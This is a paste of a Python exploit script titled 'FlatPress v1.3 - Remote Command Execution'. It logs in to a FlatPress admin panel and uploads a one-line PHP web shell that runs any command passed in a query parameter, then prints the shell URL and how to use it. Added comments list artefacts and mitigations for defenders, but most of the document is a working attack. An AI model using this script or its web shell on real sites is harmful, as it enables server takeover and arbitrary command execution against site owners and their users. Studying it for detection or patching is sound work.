FlyFar

FlatPress v1.3 - Remote Command Execution

Apr 22nd, 2024
Python 2.48 KB | Cybersecurity | 0 0
  1. # Exploit Title: FlatPress v1.3 - Remote Command Execution
  2. # Discovered by: Ahmet Ümit BAYRAM
  3. # Discovered Date: 19.04.2024
  4. # Vendor Homepage: https://www.flatpress.org
  5. # Software Link: https://github.com/flatpressblog/flatpress/archive/1.3.zip
  6. # Tested Version: 1.3 (latest)
  7. # Tested on: MacOS
  8.  
  9. import requests
  10. import time
  11. import random
  12. import string
  13.  
def random_string(length=5):
    """Return `length` random lowercase ASCII letters.

    Built on the `random` module, so the result is not cryptographically
    unpredictable. In this script it is only used as a throwaway file
    name, which also means the name differs on every run and cannot be
    used as a fixed indicator.
    """
    alphabet = string.ascii_lowercase
    picked = []
    for _ in range(length):
        picked.append(random.choice(alphabet))
    return ''.join(picked)
  18.  
def login_and_upload(base_url, username, password):
    """Proof of concept for the authenticated upload issue named in the header.

    Logs in to a FlatPress instance with the supplied account, then posts a
    file with a ``.php`` extension to the admin uploader and prints where
    the file should be reachable. Progress and failures are printed;
    nothing is returned.

    Args:
        base_url: Host (optionally with a path) without a scheme; the
            function prepends ``http://`` itself.
        username: Account name submitted to the login form.
        password: Password submitted to the login form.

    Notes for defenders:
        * A valid login is a precondition: the upload is only attempted
          after the response to the login request contains "Logout".
        * The file is expected under ``fp-content/attachs/`` with a random
          five-letter name ending in ``.php``. New ``.php`` files in that
          directory, and access-log requests to them carrying a ``0=``
          query parameter, are the artefacts this script leaves behind.
        * Independent of any vendor fix (no fixed version is stated on
          this page), the web server should not execute scripts from the
          upload directory, and the uploader should enforce an extension
          allow-list.
    """
    filename = random_string() + ".php"
    # Both endpoints use plain HTTP, so the credentials below travel unencrypted.
    login_url = f"http://{base_url}/login.php"
    upload_url = f"http://{base_url}/admin.php?p=uploader&action=default"

    # One session for both requests, so the login cookie is reused for the upload.
    with requests.Session() as session:
        # Exploiting
        print("Exploiting...")
        time.sleep(1)

        # Login attempt
        login_data = {
        'user': username,
        'pass': password,
        'submit': 'Login'
        }
        print("Logging in...")
        # NOTE(review): no timeout is passed, so an unresponsive host blocks here.
        response = session.post(login_url, data=login_data)
        time.sleep(1)

        # Success is inferred from the word "Logout" appearing in the returned page.
        if "Logout" in response.text:
            print("Login Successful!")
        else:
            print("Login Failed!")
            print(response.text)
            return

        # File upload attempt
        print("Shell uploading...")
        time.sleep(1)

        # Form data and files
        # The uploaded body is a one-line PHP script that runs the value of
        # query parameter `0` as an operating-system command. It is declared
        # with content type 'text/php' and a .php name, so the upload only
        # succeeds if the server filters on neither.
        files = {
        'upload[]': (filename, '<?=`$_GET[0]`?>', 'text/php'),
        }
        # NOTE(review): '_wpnonce' is a fixed value taken from the paste;
        # nothing in this script obtains a token from the server.
        form_data = {
        '_wpnonce': '9e0ed04260',
        '_wp_http_referer': '/admin.php?p=uploader',
        'upload': 'Upload'
        }

        response = session.post(upload_url, files=files, data=form_data)

        # NOTE(review): this check is loose. The second alternative matches any
        # page containing the word "Upload", which presumably includes the
        # uploader page itself, so the success message below is not proof that
        # the file was stored. When validating a fix, confirm on the filesystem.
        if "File(s) uploaded" in response.text or "Upload" in response.text:
            shell_url = f"http://{base_url}/fp-content/attachs/{filename}"
            print(f"Your Shell is Ready: {shell_url}")
            time.sleep(1)
            print(f"Shell Usage: {shell_url}?0=command")
        else:
            print("Exploit Failed!")
            print(response.status_code, response.text)
  70.  
# Example usage: python script.py <host> <username> <password>
# (<host> is given without a scheme; login_and_upload prepends http://)
if __name__ == "__main__":
    import sys

    cli_args = sys.argv[1:]
    # Exactly three positional arguments are required; anything else prints usage.
    if len(cli_args) == 3:
        base_url, username, password = cli_args
        login_and_upload(base_url, username, password)
    else:
        print("Usage: script.py <base_url> <username> <password>")
  79.            